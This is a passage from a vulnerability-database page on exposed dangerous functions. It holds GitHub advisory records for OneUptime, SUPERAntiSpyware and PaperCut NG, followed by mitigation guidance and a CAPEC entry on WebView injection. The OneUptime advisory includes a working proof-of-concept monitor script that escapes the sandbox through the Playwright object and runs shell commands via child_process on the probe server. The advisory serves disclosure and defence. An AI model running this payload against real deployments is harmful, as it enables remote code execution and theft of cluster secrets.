\"log\").value.constructor;\n\n return {\n data: {\n node: HostFunction(\u0027return process.version\u0027)(),\n cwd: HostFunction(\u0027return process.cwd()\u0027)(),\n id: HostFunction(\n \u0027return process.getBuiltinModule(\"child_process\").execSync(\"id\").toString()\u0027\n )(),\n },\n };\n\n```\n\n5. Select any one browser type, for example `Chromium`.\n6. Select any one screen type, for example `Desktop`.\n7. Set retry count to `0`.\n8. Click `Test Monitor` and choose a probe.\n\nExpected result:\n\n- the monitor execution succeeded and in the `Show More Details` the command output is shown.\n\u003cimg width=\"899\" height=\"249\" alt=\"image\" src=\"https://github.com/user-attachments/assets/98ebd26f-431b-438e-9459-7deeebf97b18\" /\u003e\n\n\n\n### Impact\n\nThis is a server-side `Remote Code Execution` issue affecting the probe component.\n\nWho is impacted:\n\n- any OneUptime deployment where an attacker can obtain ordinary project membership\n- environments where the probe has access to internal services, secrets, Kubernetes metadata, database credentials, proxy credentials, or other cluster-local trust relationships",
"id": "GHSA-4j36-39gm-8vq8",
"modified": "2026-03-10T18:44:23Z",
"published": "2026-03-07T02:39:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-4j36-39gm-8vq8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30921"
},
{
"type": "PACKAGE",
"url": "https://github.com/OneUptime/oneuptime"
},
{
"type": "WEB",
"url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorStep.tsx#L861-L918"
},
{
"type": "WEB",
"url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorTest.tsx#L66-L84"
},
{
"type": "WEB",
"url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/Monitor.ts#L45-L78"
},
{
"type": "WEB",
"url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/MonitorTest.ts#L27-L60"
},
{
"type": "WEB",
"url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Server/Utils/VM/VMRunner.ts#L323-L405"
},
{
"type": "WEB",
"url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchList.ts#L110-L121"
},
{
"type": "WEB",
"url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchMonitorTest.ts#L55-L85"
},
{
"type": "WEB",
"url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/Monitor.ts#L323-L338"
},
{
"type": "WEB",
"url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/MonitorTypes/SyntheticMonitor.ts#L156-L168"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "OneUptime: Synthetic Monitor RCE via exposed Playwright browser object"
}
GHSA-4J75-478W-F7PX
Vulnerability from github – Published: 2025-12-24 00:30 – Updated: 2025-12-24 00:30RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27675.
{
"affected": [],
"aliases": [
"CVE-2025-14493"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-23T22:15:50Z",
"severity": "HIGH"
},
"details": "RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27675.",
"id": "GHSA-4j75-478w-f7px",
"modified": "2025-12-24T00:30:15Z",
"published": "2025-12-24T00:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14493"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1170"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-4JPF-8W9V-465F
Vulnerability from github – Published: 2024-11-22 21:32 – Updated: 2024-11-22 21:32PaperCut NG print.script.sandboxed Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PaperCut NG. Authentication is required to exploit this vulnerability.
The specific flaw exists within the management of the print.script.sandboxed setting. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-20965.
{
"affected": [],
"aliases": [
"CVE-2023-39470"
],
"database_specific": {
"cwe_ids": [
"CWE-749"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-11-22T20:15:05Z",
"severity": "HIGH"
},
"details": "PaperCut NG print.script.sandboxed Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PaperCut NG. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the management of the print.script.sandboxed setting. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-20965.",
"id": "GHSA-4jpf-8w9v-465f",
"modified": "2024-11-22T21:32:15Z",
"published": "2024-11-22T21:32:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39470"
},
{
"type": "WEB",
"url": "https://www.papercut.com/kb/Main/SecurityBulletinJune2023"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-786"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities.
Mitigation
Strategy: Attack Surface Reduction
- Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:
- Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting.
- accessible to all users
- restricted to a small set of privileged users
- prevented from being directly accessible at all
CAPEC-500: WebView Injection
An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.